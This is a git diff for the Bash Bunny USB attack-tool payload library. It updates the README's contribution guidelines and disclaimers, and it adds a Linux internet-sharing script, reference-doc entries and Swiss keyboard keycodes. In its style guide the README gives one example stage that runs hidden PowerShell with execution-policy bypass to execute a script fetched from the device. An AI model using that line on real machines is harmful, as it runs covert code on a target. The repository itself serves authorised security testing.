diff --git a/.gitignore b/.gitignore
index c4579502..df67dba9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
.DS_Store
/.project
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
+bunny_connecter_config.txt
diff --git a/README.md b/README.md
index a049fe64..cd03efb6 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,290 @@
-# Payload Library for the Bash Bunny by Hak5
+# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
-![Bash Bunny](https://www.hak5.org/wp-content/uploads/2017/10/icon3-169x169.png)
+This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
-* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
-* [Documentation and Wiki](https://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
-* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
-* IRC: irc.hak5.org #BashBunny
-* Discord: https://discord.gg/WuteWPf
+**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** See Legal and Disclaimers
+
+
+
+
+
+
+View Featured Bash Bunny Payloads and Leaderboard
+
Get your payload in front of thousands. Enter to win over $2,000 in prizes in the Hak5 Payload Awards!
+
+
+
+
+
+# Table of contents
+
+
+
+
+
+## Shop
+- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
+- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
+- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
+## Getting Started
+- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
+## Documentation / Learn More
+- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
+
+## Community
+*Got Questions? Need some help? Reach out:*
+- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
+
+
+## Additional Links
+ Follow the creators
+
+ Korben's Socials
+
+
+
+ Darren's Socials
+
+
+
+
+
+
+
+Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## ADVANCED ATTACKS
+
+For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
+
+
+
+
+
+## SIMPLE PAYLOADS
+
+Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
+
+
+
+
+
+## SIMPLE POWERFUL HARDWARE
+
+It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
+
+
+
+
+Take your DuckyScript™ payloads to the next level with this full-featured, web-based (entirely client side) development environment.
+
+
+
+Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
+
+Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
+
+Become a PayloadStudio Pro and Unleash your hacking creativity!
+
+OR
+
+ Try Community Edition FREE
+
+
+
+ Payload Studio Themes Preview GIF
+
+
+
+ Payload Studio Autocomplete Preview GIF
+
+
+
+## Disclaimer
+Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
+
+
+
+
+
+
+View Featured Payloads and Leaderboard
+
+
+# Please adhere to the following best practices and style guides when submitting a payload.
+
+Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
+
+Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
+
+
+### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
+Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
+
+
+
+## Naming Conventions
+Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
+
+## Staged Payloads
+"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
+
+While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
+
+Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
+See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
+
+Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
+
+### Including URLs
+URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
+
+### Staged Example
+
+**Example scenario: your payload downloads a script and the executes it on a target machine.**
+- Include the script in the directory with your payload
+- Provide instructions for the user to move the script to the appropriate hosting service.
+- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
+
+[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
+
+## Payload Configuration
+Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
+In many cases, payloads will require some level of configuration **by the end payload user**.
+
+- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
+- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
+- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
+- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
+
+```
+Example:
+ BEGINNING OF PAYLOAD
+ ... Payload Documentation...
+
+ # CONFIGURATION
+ # REQUIRED - Provide URL used for Example
+ MY_TARGET_URL="example.com"
+
+ # OPTIONAL - How long until payload starts; default 5s
+ BOOT_DELAY="5000"
+
+ QUACK DELAY $BOOT_DELAY
+ ...
+ QUACK STRING $MY_TARGET_URL
+ ...
+```
+
+## Payload Documentation
+Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
+
+```
+Example:
+ BEGINNING OF PAYLOAD
+
+ # Title: Example Payload
+ # Author: Korben Dallas
+ # Description: Opens hidden powershell and
+ # Target: Windows 10
+ # Props: Hak5, Darren Kitchen, Korben
+ # Version: 1.0
+ # Category: General
+```
+
+
+### Binaries
+Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
+
+
+### Configuration Options
+Configurable options should be specified in variables at the top of the payload.txt file
+
+ # Options
+ RESPONDER_OPTIONS="-w -r -d -P"
+ LOOTDIR=/root/udisk/loot/quickcreds
+
+### LED
+The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
+
+ # Initialization
+ LED SETUP
+ GET SWITCH_POSITION
+ GET HOST_IP
+
+ # Attack
+ LED ATTACK
+ ATTACKMODE HID ECM_ETHERNET
+
+### Stages and States
+Stages should be documented with comments
+
+ # Keystroke Injection Stage
+ # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
+ GET HOST_IP
+ LED STAGE1
+ ATTACKMODE HID
+ RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
+
+Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
+
+
+
+Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
+
+Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
+Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
+DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
+This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
+Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
+
+See also:
+
+[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
+
+[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
+
+# Disclaimer
+As with any script, you are advised to proceed with caution.
+Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.
diff --git a/bunny-connecter.sh b/bunny-connecter.sh
new file mode 100755
index 00000000..d6d6fd09
--- /dev/null
+++ b/bunny-connecter.sh
@@ -0,0 +1,321 @@
+#!/bin/bash
+# Bash Bunny Connector for Linux
+# EULA https://www.bashbunny.com/licence/eula.txt
+# License https://www.bashbunny.com/licence/software_licence.txt
+
+bbver=1
+BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
+
+if [ "$EUID" -ne 0 ]
+ then echo "This Bash Bunny Connection script requires root."
+ sudo su -s "$0"
+ exit
+fi
+
+function banner {
+ # Show random banner because 1337
+ b=$(( ( RANDOM % 5 ) + 1 ))
+ case "$b" in
+ 1)
+ echo $(tput setaf 3)
+ echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
+ echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
+ echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
+ echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
+ echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
+ echo "$(tput sgr0) v$bbver";
+ ;;
+ 2)
+ echo $(tput setaf 3)
+ echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
+ echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
+ echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
+ echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
+ echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
+ echo "$(tput sgr0) v$bbver";
+ ;;
+ 3)
+ echo $(tput setaf 3)
+ echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
+ echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
+ echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
+ echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
+ echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
+ echo "$(tput sgr0) v$bbver";
+ ;;
+ 4)
+ echo $(tput setaf 3)
+ echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
+ echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
+ echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
+ echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
+ echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
+ echo "$(tput sgr0) v$bbver";
+ ;;
+ 5)
+ echo $(tput setaf 3)
+ echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
+ echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
+ echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
+ echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
+ echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
+ echo "$(tput sgr0) v$bbver";
+ ;;
+ esac
+}
+
+function showsettings {
+ printf "\n\
+ $(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
+ to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
+}
+
+function menu {
+ start_clean # removes bunny related rules without doing a full flush
+ printf "\n\
+ [$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
+ [$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
+ [$(tput bold)M$(tput sgr0)]anual setup\n\
+ [$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
+ [$(tput bold)Q$(tput sgr0)]uit\n\n "
+ read -r -sn1 key
+ case "$key" in
+ [gG]) guidedsetup;;
+ [mM]) manualsetup;;
+ [cC]) connectsaved;;
+ [aA]) advancedsetup;;
+ [bB]) bunny;;
+ [qQ]) printf "\n"; start_clean; exit;;
+ esac
+}
+
+function manualsetup {
+ ipinstalled=$(which ip)
+ if [[ "$?" == 0 ]]; then
+ ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
+ printf "\n Select Bash Bunny Interface:\n"
+ for i in "${!ifaces[@]}"; do
+ printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
+ printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
+ done
+ read -r -p " > " planq
+ if [ "$planq" -eq "$planq" ] 2>/dev/null; then
+ sbunnylan=(${ifaces[planq]})
+ else
+ printf "\n Response must be a listed numeric option\n"; manualsetup
+ fi
+ printf "\n Select Internet Interface:\n"
+ for i in "${!ifaces[@]}"; do
+ printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
+ printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
+ done
+ read -r -p " > " inetq
+ if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
+ sbunnywan=(${ifaces[inetq]})
+ else
+ printf "\n Response must be a listed numeric option\n"; manualsetup
+ fi
+ printf "\n$(netstat -nr)\n\n"
+ read -r -p " Specify Default Gateway IP Address: " sbunnygw
+ savechanges
+ else
+ printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
+ menu
+ fi
+}
+
+function guidedsetup {
+ hasiproute2=$(which ip)
+ if [[ "$?" == 1 ]]; then
+ printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
+ fi
+ hasdefaultroute=$(ip route)
+ if [[ "$?" == 1 ]]; then
+ printf "\n No route detected. Check connection and try again.\n"; menu
+ fi
+
+ printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
+ Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
+ read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
+ case $usedgw in
+ [yY][eE][sS]|[yY]|'')
+ sbunnygw=($(ip route | grep default | awk {'print $3'}))
+ ;;
+ [nN][oO]|[nN])
+ printf "\n$(ip route)\n\n"
+ read -r -p " Specify the default gateway by IP address: " sbunnygw
+ ;;
+ esac
+
+ printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
+ Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
+ read -r -p " Use the above reported Internet interface? [Y/n]? " useii
+ case $useii in
+ [yY][eE][sS]|[yY]|'')
+ sbunnywan=($(ip route | grep default | awk {'print $5'}))
+ ;;
+ [nN][oO]|[nN])
+ printf "\n Available Network Interfaces:\n"
+ ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
+ for i in "${!ifaces[@]}"; do
+ printf " \t%s\t" "${ifaces[$i]}"
+ printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
+ done
+ read -r -p " Specify the internet interface by name: " sbunnywan
+ ;;
+ esac
+
+ printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
+
+ a="0"
+ until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
+ do
+ printf "."
+ sleep 1
+ a=$[$a+1]
+ if [[ $a == "51" ]]; then
+ printf "\n "
+ a=0
+ fi
+ done
+ printf "[Checking]"
+ sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
+ bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
+ printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
+ read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
+ case $pi in
+ [yY][eE][sS]|[yY]|'')
+ sbunnylan=$bunnyiface
+ ;;
+ [nN][oO]|[nN])
+ printf "\n Available Network Interfaces:\n"
+ ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
+ for i in "${!ifaces[@]}"; do
+ printf " \t%s\t" "${ifaces[$i]}"
+ printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
+ done
+ read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
+ ;;
+ esac
+ savechanges
+}
+
+function advancedsetup {
+ printf "\n\
+ By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
+ with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
+ The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
+ default, which this script aids in configuring. These IP addresses may\n\
+ be changed if desired by modifying network configs on the Bash Bunny.\n\n"
+ read -r -p " Continue with advanced IP config [y/N]? " qcontinue
+ case $qcontinue in
+ [nN][oO]|[nN]|'') menu ;;
+ [yY][eE][sS]|[yY])
+ read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
+ if [[ $sbunnynet == '' ]]; then
+ sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
+ fi
+ read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
+ if [[ $sbunnynmask == '' ]]; then
+ sbunnynmask=255.255.255.0 #Default netmask for /24 network
+ fi
+ read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
+ if [[ $sbunnyhostip == '' ]]; then
+ sbunnyhostip=172.16.64.64 #IP Address of host computer
+ fi
+ read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
+ if [[ $sbunnyip == '' ]]; then
+ sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
+ fi
+ printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
+ savechanges
+ ;;
+ esac
+}
+
+function savechanges {
+ # using ";" as a delmiter in sed is a-okay
+ sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
+ sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
+ sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
+ sfirsttime=0
+ printf "\n Settings saved.\n"
+ showsettings
+ menu
+}
+
+function connectsaved {
+ if [[ "$sfirsttime" == "1" ]]; then
+ printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
+ fi
+ ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
+ printf "Detecting Bash Bunny..."
+ until ping $sbunnyip -c1 -w1 >/dev/null
+ do
+ printf "."
+ ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
+ sleep 1
+ done
+ printf "...found.\n\n"
+ printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
+ printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
+ printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
+ ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
+ echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
+ iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
+ iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
+ iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
+ route del default #remove default route
+ route add default gw $sbunnygw $sbunnywan #add default gateway
+ printf "\n\n"
+ exit
+}
+
+function start_clean {
+ # undo all iptables Bashbunny related rules
+ iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
+ iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
+ iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
+ echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
+}
+
+function create_bbsh_config {
+ echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
+ echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
+ echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
+ echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
+ echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
+ echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
+ echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
+ echo "sfirsttime=1" >> "$BBSH_CONFIG"
+}
+
+function bunny {
+ printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
+ printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
+ exit
+}
+
+banner #remove for less 1337
+showsettings
+
+# create bbsh_config if it doesn't exist
+[ -f "$BBSH_CONFIG" ] || create_bbsh_config
+source "$BBSH_CONFIG"
+
+if [[ "$sfirsttime" == "1" ]]; then
+ printf "
+ Since this is the first time running the BB Internet Connection Sharing\n\
+ script, Guided setup is recommended to save initial configuration.\n\
+ Subsequent sessions may be quickly connected using saved settings.\n"
+fi
+
+# Removes iptables rules if the script gets a Ctrl-C
+trap start_clean INT
+
+menu
diff --git a/docs/readme.txt b/docs/readme.txt
index ed0b9437..04f8598f 100644
--- a/docs/readme.txt
+++ b/docs/readme.txt
@@ -6,7 +6,7 @@
Bash Bunny by Hak5 USB Attack/Automation Platform
- -+- QUICK REFERENCE GUIDE v1.4 -+-
+ -+- QUICK REFERENCE GUIDE v1.5 -+-
+-----------------+
@@ -107,6 +107,8 @@
$HOST_IP IP Address of the Bash Bunny
(Default: 172.16.64.1)
$SWITCH_POSITION "switch1", "switch2" or "switch3"
+ $BB_LABEL Volume name of the BashBunny
+ when mounted.
@@ -153,6 +155,8 @@
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
GET HOST_IP Returns $HOST_IP
GET SWITCH_POSITION Returns $SWITCH_POSITION
+ GET TARGET_OS Returns $TARGET_OS
+ GET BB_LABEL Returns $BB_LABEL
diff --git a/languages/ch.json b/languages/ch.json
index 265ff509..8b36ce21 100644
--- a/languages/ch.json
+++ b/languages/ch.json
@@ -165,5 +165,104 @@
"\\":"40,00,64",
"COMMAND-CTRL-SHIFT":"40,00,64",
"COMMAND-CTRL":"40,00,64",
- "COMMAND-OPTION-SHIFT'":"40,00,64"
-}
\ No newline at end of file
+ "COMMAND-OPTION-SHIFT'":"40,00,64",
+ "__comment":"Everything below was additionally added by kuyaya",
+ "GUI-l":"08,00,0f",
+ "RIGHTSHIFT":"20,00,00",
+ "A":"20,00,04",
+ "B":"20,00,05",
+ "C":"20,00,06",
+ "D":"20,00,07",
+ "E":"20,00,08",
+ "F":"20,00,09",
+ "G":"20,00,0a",
+ "H":"20,00,0b",
+ "I":"20,00,0c",
+ "J":"20,00,0d",
+ "K":"20,00,0e",
+ "L":"20,00,0f",
+ "M":"20,00,10",
+ "N":"20,00,11",
+ "O":"20,00,12",
+ "P":"20,00,13",
+ "Q":"20,00,14",
+ "R":"20,00,15",
+ "S":"20,00,16",
+ "T":"20,00,17",
+ "U":"20,00,18",
+ "V":"20,00,19",
+ "W":"20,00,1a",
+ "X":"20,00,1b",
+ "Z":"20,00,1c",
+ "Y":"20,00,1d",
+ "+":"20,00,1e",
+ "\"":"20,00,1f",
+ "*":"20,00,20",
+ "%":"20,00,22",
+ "&":"20,00,23",
+ "/":"20,00,24",
+ "(":"20,00,25",
+ ")":"20,00,26",
+ "=":"20,00,27",
+ "?":"20,00,2d",
+ "`":"20,00,2e",
+ "!":"20,00,30",
+ ";":"20,00,36",
+ ":":"20,00,37",
+ "_":"20,00,38",
+ ">":"20,00,64",
+ "°":"02,00,35",
+ "°":"20,00,35",
+ "§":"00,00,35",
+ "ç":"02,00,21",
+ "ç":"20,00,21",
+ "¬":"40,00,23",
+ "¦":"40,00,1e",
+ "¢":"40,00,25",
+ "´":"40,00,2d",
+ "BACKSPACE":"00,00,2a",
+ "SHIFT-BACKSPACE":"02,00,2a",
+ "SHIFT-BACKSPACE":"20,00,2a",
+ "€":"40,00,08",
+ "è":"02,00,2f",
+ "è":"20,00,2f",
+ "ü":"00,00,2f",
+ "¨":"00,00,30",
+ "é":"02,00,33",
+ "é":"20,00,33",
+ "ö":"00,00,33",
+ "ä":"00,00,34",
+ "à":"02,00,34",
+ "à":"20,00,34",
+ "£":"02,00,32",
+ "£":"20,00,32",
+ "ALT-GR":"40,00,00",
+ "RIGHTCONTROL":"10,00,00",
+ "NUMLOCK":"00,00,53",
+ "+":"00,00,57",
+ "-":"00,00,56",
+ "*":"00,00,55",
+ "/":"00,00,54",
+ "ENTER":"00,00,58",
+ "DEL":"00,00,63",
+ "INSERT":"00,00,62",
+ "END":"00,00,59",
+ "DOWN":"00,00,5a",
+ "PAGEDOWN":"00,00,5b",
+ "LEFT":"00,00,5c",
+ "RIGHT":"00,00,5e",
+ "HOME":"00,00,5f",
+ "UP":"00,00,60",
+ "PAGEUP":"00,00,61",
+ ".":"00,00,63",
+ "0":"00,00,62",
+ "1":"00,00,59",
+ "2":"00,00,5a",
+ "3":"00,00,5b",
+ "4":"00,00,5c",
+ "5":"00,00,5d",
+ "6":"00,00,5e",
+ "7":"00,00,5f",
+ "8":"00,00,60",
+ "9":"00,00,61"
+}
diff --git a/languages/es-la.json b/languages/es-la.json
index 6c19dca4..25449936 100644
--- a/languages/es-la.json
+++ b/languages/es-la.json
@@ -144,7 +144,7 @@
"/":"02,00,24",
